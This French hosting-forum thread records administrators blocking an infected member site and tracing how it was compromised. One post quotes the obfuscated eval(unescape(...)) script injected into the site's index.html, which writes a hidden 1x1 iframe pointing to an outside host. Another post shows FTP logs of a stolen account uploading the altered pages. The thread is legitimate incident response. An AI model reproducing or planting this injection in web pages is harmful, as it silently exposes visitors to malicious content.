• Inscrit : 15-08-2010
  • Messages : 2.073

Sujet : Site utilisé pour du piratage: http://webproject.lescigales.org/

Bonjour,

Le site suivant a été bloqué: http://webproject.lescigales.org/
pour la raison suivante: Site utilisé pour du piratage
par le modérateur: simon.bedoin
type de blocage: manual

Commentaire du modérateur (optionnel): Le site semble infecté; J'obtient un belle alerte de la part de mon anti-virus.

http://binarysim.lescigales.org/webproject/webproject.jpg

Si vous contestez la décision ou souhaitez résoudre ce blocage, nous vous invitons à répondre à ce post.

I'm the law !

Citer Message 1

2 Réponse de toad

  • toad
  • toad
  • Equipe lesCigales.ORG
  • Déconnecté
  • Inscrit : 11-07-2005
  • Messages : 2.394

Re: Site utilisé pour du piratage: http://webproject.lescigales.org/

Je confirme vu la tronche du footer de la page index.html:

</html>
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%31%30%35%36%34%33%34%33%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
lesCigales.ORG sysadm1n
L'hébergeur qui sent bon la lavande - Un control panel qu'il est chouette - Viendez nous parler!
"All that is necessary for evil to triumph is for good men to do nothing."

de toad le site Web

Citer Message 2

3 Réponse de toad

  • toad
  • toad
  • Equipe lesCigales.ORG
  • Déconnecté
  • Inscrit : 11-07-2005
  • Messages : 2.394

Re: Site utilisé pour du piratage: http://webproject.lescigales.org/

Ca me fait penser.. faudrait regarder comme ces injections de html marchent ... histoire de bloquer les sites à risque éventuellement.

lesCigales.ORG sysadm1n
L'hébergeur qui sent bon la lavande - Un control panel qu'il est chouette - Viendez nous parler!
"All that is necessary for evil to triumph is for good men to do nothing."

de toad le site Web

Citer Message 3

4 Réponse de toad

  • toad
  • toad
  • Equipe lesCigales.ORG
  • Déconnecté
  • Inscrit : 11-07-2005
  • Messages : 2.394

Re: Site utilisé pour du piratage: http://webproject.lescigales.org/

Ok la réponse était: compte FTP volé

ftp a écrit:

Nov 17 12:52:43 ns1 pure-ftpd: (?@217.77.75.221) [INFO] fxm_ftp is now logged in
Nov 17 12:52:46 ns1 pure-ftpd: (?@217.77.75.221) [INFO] fxm_ftp is now logged in
Nov 17 12:52:49 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [NOTICE] /home/users/00/15/d7/home/www//index.html downloaded  (2793 bytes, 121.41KB/sec)
Nov 17 12:52:53 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [ERROR] Can't open /index.html: No such file or directory
Nov 17 12:52:54 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [INFO] Logout.
Nov 17 12:52:54 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [NOTICE] /home/users/00/15/d7/home/www//index.html uploaded  (3110 bytes, 0.79KB/sec)
Nov 17 12:52:54 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [INFO] Logout.
Nov 17 12:52:58 ns1 pure-ftpd: (?@217.77.75.221) [INFO] fxm_ftp is now logged in
Nov 17 12:52:58 ns1 pure-ftpd: (?@217.77.75.221) [INFO] fxm_ftp is now logged in
Nov 17 12:53:03 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [NOTICE] /home/users/00/15/d7/home/www//LKA_Services/index.html downloaded  (2327 bytes, 164.81KB/sec)
Nov 17 12:53:04 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [NOTICE] /home/users/00/15/d7/home/www//LKA_Services/index.html uploaded  (2644 bytes, 8.09KB/sec)
Nov 17 12:53:05 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [NOTICE] /home/users/00/15/d7/home/www//LKA_Services/tfile_main.html downloaded  (12557 bytes, 1031.35KB/sec)
Nov 17 12:53:11 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [NOTICE] /home/users/00/15/d7/home/www//LKA_Services/tfile_main.html uploaded  (12874 bytes, 8.91KB/sec)
Nov 17 12:53:11 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [INFO] Logout.
Nov 17 12:53:14 ns1 pure-ftpd: (fxm_ftp@217.77.75.221) [NOTICE] /home/users/00/15/d7/home/www//LKA_Services/index.html downloaded  (2644 bytes, 61533.09KB/sec)

lesCigales.ORG sysadm1n
L'hébergeur qui sent bon la lavande - Un control panel qu'il est chouette - Viendez nous parler!
"All that is necessary for evil to triumph is for good men to do nothing."

de toad le site Web

Citer Message 4

5 Réponse de toad

  • toad
  • toad
  • Equipe lesCigales.ORG
  • Déconnecté
  • Inscrit : 11-07-2005
  • Messages : 2.394

Re: Site utilisé pour du piratage: http://webproject.lescigales.org/

Ce qui me renforce dans l'idée de supprimer les comptes FTP après un certain temps d'inutilisation..

lesCigales.ORG sysadm1n
L'hébergeur qui sent bon la lavande - Un control panel qu'il est chouette - Viendez nous parler!
"All that is necessary for evil to triumph is for good men to do nothing."

de toad le site Web

Citer Message 5